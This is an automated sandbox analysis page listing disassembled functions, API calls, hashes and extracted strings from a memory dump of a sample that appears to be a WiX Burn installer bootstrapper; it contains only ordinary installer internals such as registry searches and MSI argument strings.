Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorHandleInitLastModuleVariant
String ID:
API String ID: 52713655-0
Opcode ID: bf2fba84e53cb05aabedcfafdc7320a6a02816c3467df81ee6cf7f3ae2f70d69
Instruction ID: c355374f550018f1b142d856ee9859322a94b6adcbaa78043745fe4c2a108a83
Opcode Fuzzy Hash: bf2fba84e53cb05aabedcfafdc7320a6a02816c3467df81ee6cf7f3ae2f70d69
Instruction Fuzzy Hash: 9E313E76D01229ABCB11DFA8C884ADEBBF8FF08710F01456BE905AB311E6359D00CBA1

Function 005D5870 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80070490,00000000,80070490,005FAAA0,00000000,80070490,?,?,005A8B19,WiX\Burn,PackageCache,00000000,005FAAA0,00000000,00000000,80070490), ref: 005D58CA

Part of subcall function 005D10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 005D112B
Part of subcall function 005D10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 005D1163

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: QueryValue$Close
String ID:
API String ID: 1979452859-0
Opcode ID: 9e7043dd13e8f147f0539b21985d311ed9f5c52b6963d24d98034824b6d97154
Instruction ID: d7048775727aceab3d21b041dcd2ef432a4a3ac729221f32cdda48fb334dcfcb
Opcode Fuzzy Hash: 9e7043dd13e8f147f0539b21985d311ed9f5c52b6963d24d98034824b6d97154
Instruction Fuzzy Hash: 37118C3680062AEF8B31AE98C9459AEBF68FB44360B25413BFD0167311E7314E60F791

Function 005C5305 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,005C6213,00000001,00000364), ref: 005C5346

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 661b7ec8e1cfc30da72855a8bf6f1730d0b332f703015b82424fc25bd4f1a68e
Instruction ID: bea9480509ee0d25661cbc911f3aa93d1c2e93794632a6152674dca21e511286
Opcode Fuzzy Hash: 661b7ec8e1cfc30da72855a8bf6f1730d0b332f703015b82424fc25bd4f1a68e
Instruction Fuzzy Hash: 6EF0BB32101965AEDB211EE58C05F567F49BF80BE0B58982DB814D6191EAB0FC819690

Function 005934B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,005A8BD3,0000001C,80070490,00000000,00000000,80070490), ref: 005934D5

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 8c8c8501246dbe59ce4e21973b1ec4d5c7ca0bb646e747dfe45d18641288bd11
Instruction ID: 41c9af7102162b21a4a3efacbfeb883356d0486f90b4950171ee7139a6969e4d
Opcode Fuzzy Hash: 8c8c8501246dbe59ce4e21973b1ec4d5c7ca0bb646e747dfe45d18641288bd11
Instruction Fuzzy Hash: A7E0C272201125BBEF122E619C08CAB3F8CBF04350B018011BE04D2000D322D600A2B0

Function 005D2EFE Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000,00000000,0059556E,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005D2F0B

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 469372b2cedfe3d0f84d8f0719f3fc8b83342f3807ca40efa72fbd1da5aa6558
Instruction ID: cf99f3b289f73d03082847e31eaba1e12b388aec7afd5ccdafc9b95d804eed13
Opcode Fuzzy Hash: 469372b2cedfe3d0f84d8f0719f3fc8b83342f3807ca40efa72fbd1da5aa6558
Instruction Fuzzy Hash: CAE009F1926235DFAB108F69FD454627FBDB779B41325460BB800C6220CBB84449EFE0

Function 005CF479 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005CF491

Part of subcall function 005D998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005D9A09
Part of subcall function 005D998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005D9A1A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e6558e05a172e52585949dfc48754d128786da5b5d33d71d3dc5937f526366ca
Instruction ID: 122b262ce75868aba7ad9a065368495c4e988cee82c59861ca0d5cae318184e3
Opcode Fuzzy Hash: e6558e05a172e52585949dfc48754d128786da5b5d33d71d3dc5937f526366ca
Instruction Fuzzy Hash: 15B012E92A94067C360822642D16C370D0CF1C1F21330C67FB900C0040A8841C010033

Function 005CF49A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005CF491

Part of subcall function 005D998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005D9A09
Part of subcall function 005D998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005D9A1A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 39db6a5828f04ea394c70bfad2325ba23c41bf848af4e71ec3b4ba758ee7a1d9
Instruction ID: 47f63d8b71435c67f9a05e5ecfdff5ed877f2794bd90833012403d09658f9d17
Opcode Fuzzy Hash: 39db6a5828f04ea394c70bfad2325ba23c41bf848af4e71ec3b4ba758ee7a1d9
Instruction Fuzzy Hash: E6B012E52A94066D364862682E17D370D4CF1C5F21330857FB504C1140E8881C020133

Function 005CF4AA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005CF491

Part of subcall function 005D998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005D9A09
Part of subcall function 005D998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005D9A1A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a538922651087a6ce984808482d968cba6ecce5fbb858c408dfff1f2496f698b
Instruction ID: 33a00cdfd83a894f2b6bc98407627b4fe9a55d37eb75ab4b100538aeda8d8eb6
Opcode Fuzzy Hash: a538922651087a6ce984808482d968cba6ecce5fbb858c408dfff1f2496f698b
Instruction Fuzzy Hash: 9DB012E52A95066C364862682D16D370D4CF1C5F21330C67FF504C1140E8842C410133

Function 005D9653 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005D966B

Part of subcall function 005D998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005D9A09
Part of subcall function 005D998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005D9A1A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5f7ecda652eea817859cf9719fc1089330f7e817f51a14cc316ea1c1a44cb38e
Instruction ID: 530b03e1005c217b1a8cc3ddc9b1b20a1eacd09716bf701eac7c5df2bff2a6c7
Opcode Fuzzy Hash: 5f7ecda652eea817859cf9719fc1089330f7e817f51a14cc316ea1c1a44cb38e
Instruction Fuzzy Hash: 3AB012D626810A7C3A1422086D86C370D0CF5C0F11330852FB100E0240A8845C014333

Function 005D9674 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005D966B

Part of subcall function 005D998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005D9A09
Part of subcall function 005D998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005D9A1A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6638f9bcc80587098f8ac1d5edc91741eec1d396d472e03b4e4bfba070cfee8b
Instruction ID: 417ff2bb7c06218755ceeb8b7d7153a1ec9e1ff4ddfa2b0d4ee99facca169bd6
Opcode Fuzzy Hash: 6638f9bcc80587098f8ac1d5edc91741eec1d396d472e03b4e4bfba070cfee8b
Instruction Fuzzy Hash: F4B012D72680076C3654620C1D07C370D8CF1C0F11330C52FB504C1240E8845C054233

Function 005D9684 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005D966B

Part of subcall function 005D998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005D9A09
Part of subcall function 005D998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005D9A1A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9f3dd9cbdf14bf9271508f7741bc1300b6addadfa50591026d26dc39e8f361bd
Instruction ID: f737682f1ba30c1e36244295da217ee5eb408e19a052fa785844eec1cf9160d3
Opcode Fuzzy Hash: 9f3dd9cbdf14bf9271508f7741bc1300b6addadfa50591026d26dc39e8f361bd
Instruction Fuzzy Hash: 21B012D62682066C3A54624C2F47C370D4CF5C0F11330452FB104D1340E8885C024233

Function 005914B6 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,005921A8,?,00000000,?,00000000,?,0059390C,00000000,?,00000104), ref: 005914E8

Part of subcall function 00593BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,005921CC,000001C7,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593BDB
Part of subcall function 00593BD3: HeapSize.KERNEL32(00000000,?,005921CC,000001C7,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593BE2

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Heap$ProcessSizelstrlen
String ID:
API String ID: 3492610842-0
Opcode ID: 44a293e53520b6b2f03dee0e3c9700c0bc1af165f8de34473df45d8d9fc0dbc0
Instruction ID: 75bacbdcabc42fc51801f0b9bed691f289063f0df5f7ac71897622114c81f117
Opcode Fuzzy Hash: 44a293e53520b6b2f03dee0e3c9700c0bc1af165f8de34473df45d8d9fc0dbc0
Instruction Fuzzy Hash: 5E01F937200A3BEBCF215E54EC84F9A7F66FF88750F124215FA1A5B251D631AC409AD8

Non-executed Functions

Function 0059A8F1 Relevance: 173.9, APIs: 29, Strings: 70, Instructions: 688COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 0059B11C

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

CompareStringW.KERNEL32(0000007F,00000000,005DCA9C,000000FF,DirectorySearch,000000FF,005DCA9C,Condition,feclient.dll,005DCA9C,Variable,?,005DCA9C,005DCA9C,?,?), ref: 0059AA29
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0059AA7E
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 0059AA9A
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 0059AABE
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0059AB11
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0059AB2B
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 0059AB53
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 0059AB91
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 0059ABB0
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 0059ABCF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 0059AC8D
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 0059ACA7

Part of subcall function 005D32F3: VariantInit.OLEAUT32(?), ref: 005D3309
Part of subcall function 005D32F3: SysAllocString.OLEAUT32(?), ref: 005D3325
Part of subcall function 005D32F3: VariantClear.OLEAUT32(?), ref: 005D33AC
Part of subcall function 005D32F3: SysFreeString.OLEAUT32(00000000), ref: 005D33B7

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 0059AD06
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 0059AD28
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0059AD48
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 0059AE20
SysFreeString.OLEAUT32(?), ref: 0059AFFE

Strings

Failed to get Value attribute., xrefs: 0059B03C
Invalid value for @VariableType: %ls, xrefs: 0059B05D
HKLM, xrefs: 0059ABC2
MsiComponentSearch, xrefs: 0059AD61
directory, xrefs: 0059AE13
FileSearch, xrefs: 0059AAB1
Invalid value for @Type: %ls, xrefs: 0059B0A1
HKCR, xrefs: 0059AB82
Failed to get @FeatureId., xrefs: 0059B0B7
Failed to get Key attribute., xrefs: 0059B06E
clbcatq.dll, xrefs: 0059AA3A, 0059AACD, 0059AD83, 0059AF75
Failed to get @VariableType., xrefs: 0059B064
Invalid value for @Root: %ls, xrefs: 0059B078
language, xrefs: 0059AEF7
Failed to get @Type., xrefs: 0059B0B0
numeric, xrefs: 0059ACF7
string, xrefs: 0059AD1B
Root, xrefs: 0059AB69
wininet.dll, xrefs: 0059AC03
Variable, xrefs: 0059A9DE
search.cpp, xrefs: 0059A973
msi.dll, xrefs: 0059AC5C
Failed to get next node., xrefs: 0059B0EB
VariableType, xrefs: 0059ACDE
ProductCode, xrefs: 0059AD84, 0059AE5C, 0059AF76
MsiProductSearch, xrefs: 0059AE39
Failed to get @Root., xrefs: 0059B07F
Failed to allocate memory for search structs., xrefs: 0059A97D
DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch, xrefs: 0059A90D
version.dll, xrefs: 0059AC1E
Win64, xrefs: 0059AC5D
value, xrefs: 0059AC9A
ComponentId, xrefs: 0059ADA7
UpgradeCode, xrefs: 0059AE8C
cabinet.dll, xrefs: 0059ACBA
Failed to get @Variable., xrefs: 0059B0DD
state, xrefs: 0059ADF7, 0059AF13, 0059AFC5
Unexpected element name: %ls, xrefs: 0059B0CD
assignment, xrefs: 0059AF2D
Failed to get @UpgradeCode., xrefs: 0059B08D
Failed to get search node count., xrefs: 0059A945
path, xrefs: 0059AA8D, 0059AB3A
feclient.dll, xrefs: 0059A9F8
FeatureId, xrefs: 0059AF91
RegistrySearch, xrefs: 0059AB46
Type, xrefs: 0059AA56, 0059AAE9, 0059AC42, 0059ADC2, 0059AEC2, 0059AFAC
exists, xrefs: 0059AA6F, 0059AB02, 0059AC7E
ETY, xrefs: 0059A8F1
version, xrefs: 0059AB1E, 0059AD3B, 0059AEDB
Failed to get @Condition., xrefs: 0059B028
Failed to get @Path., xrefs: 0059B032
Failed to get @Id., xrefs: 0059B0E4
Failed to get @ExpandEnvironment., xrefs: 0059B050
Path, xrefs: 0059AA3B, 0059AACE
`Dv, xrefs: 0059AFFE, 0059B11C
Failed to get @ProductCode., xrefs: 0059B0BE
Failed to get @ComponentId., xrefs: 0059B086
Failed to get Win64 attribute., xrefs: 0059B046
ExpandEnvironment, xrefs: 0059ACBB
comres.dll, xrefs: 0059ADA6, 0059AE5B, 0059AE8B, 0059AF90
HKU, xrefs: 0059ABE1
MsiFeatureSearch, xrefs: 0059AF53
Key, xrefs: 0059AC04
Value, xrefs: 0059AC1F
Condition, xrefs: 0059A9F9
Failed to get @ProductCode or @UpgradeCode., xrefs: 0059B094
DirectorySearch, xrefs: 0059AA1A
keyPath, xrefs: 0059ADDB
HKCU, xrefs: 0059ABA3
Failed to select search nodes., xrefs: 0059A920

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ETY$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$`Dv$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
API String ID: 2748437055-2986552836
Opcode ID: 8c97f72aead8c4cc0a4fb400fbbfe134615b7201d745f14e83d16f734c35f78a
Instruction ID: 73995e4ee4f7f6a4965c23db09791e8e620d25e36a5c975081a73348f5175787
Opcode Fuzzy Hash: 8c97f72aead8c4cc0a4fb400fbbfe134615b7201d745f14e83d16f734c35f78a
Instruction Fuzzy Hash: 3022A735D49226BAEF319A999D46E6E7E64BB01B30F200753F530BA3D0D760AE40D7D1

Function 005B41EA Relevance: 43.0, Strings: 34, Instructions: 498COMMON

Download Yara Rule

Strings

VersionString, xrefs: 005B428E, 005B42EF
Failed to add feature action properties to obfuscated argument string., xrefs: 005B44DB
Failed to add reboot suppression property on install., xrefs: 005B45BB
REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 005B45F5
IGNOREDEPENDENCIES, xrefs: 005B46A5, 005B4784
WixBundleExecutePackageAction, xrefs: 005B43B7, 005B48B4
WixBundleExecutePackageCacheFolder, xrefs: 005B436A, 005B48A4
REINSTALL=ALL, xrefs: 005B45D3, 005B464D
feclient.dll, xrefs: 005B42C5, 005B434D, 005B441D, 005B454B, 005B47D8
Failed to add the list of dependencies to ignore to the properties., xrefs: 005B46CA
%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 005B4687
Failed to enable logging for package: %ls to: %ls, xrefs: 005B441F
REBOOT=ReallySuppress, xrefs: 005B45A0, 005B476C
Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 005B460C
Failed to uninstall MSI package., xrefs: 005B47EF
ACTION=ADMIN, xrefs: 005B4709
Failed to add feature action properties to argument string., xrefs: 005B44B9
%ls %ls=ALL, xrefs: 005B46B6, 005B4795
Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 005B469B
Failed to build MSI path., xrefs: 005B439D
Failed to run maintanance mode for MSI package., xrefs: 005B46F6
Failed to add properties to argument string., xrefs: 005B4463
msasn1.dll, xrefs: 005B440B
Failed to install MSI package., xrefs: 005B4746
Failed to add ADMIN property on admin install., xrefs: 005B471E
Failed to perform minor upgrade of MSI package., xrefs: 005B4638
Failed to add reboot suppression property on uninstall., xrefs: 005B477D
Failed to add obfuscated properties to argument string., xrefs: 005B4497
Failed to add patch properties to obfuscated argument string., xrefs: 005B451F
Failed to add patch properties to argument string., xrefs: 005B44FD
Failed to get cached path for package: %ls, xrefs: 005B434F
crypt32.dll, xrefs: 005B440A
Failed to add reinstall all property on minor upgrade., xrefs: 005B45EA
Failed to initialize external UI handler., xrefs: 005B43F4

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID:
